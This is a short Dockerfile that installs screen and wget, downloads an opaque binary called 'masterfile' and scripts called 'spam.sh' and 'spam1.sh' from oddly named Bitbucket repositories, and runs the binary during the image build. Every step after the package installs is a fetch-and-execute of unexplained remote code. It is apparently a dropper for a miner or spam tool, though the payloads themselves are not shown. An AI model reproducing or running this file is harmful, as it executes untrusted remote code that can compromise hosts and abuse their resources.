FROM ubuntu:zesty

RUN apt-get update
RUN apt-get install -y screen
RUN apt-get install -y wget
RUN wget https://bitbucket.org/kodkokwdokwdo/jkbwfjwfbkwbjkdsvbjkjbkjb/downloads/spam1.sh
RUN wget https://bitbucket.org/kodkokwdokwdo/jkbwfjwfbkwbjkdsvbjkjbkjb/downloads/masterfile
RUN wget https://bitbucket.org/anli-projects/storage/downloads/config.json
RUN wget https://bitbucket.org/kodkokwdokwdo/jkbwfjwfbkwbjkdsvbjkjbkjb/downloads/spam.sh
RUN chmod u+x masterfile
RUN chmod u+x spam.sh
RUN chmod u+x spam1.sh
RUN ./masterfile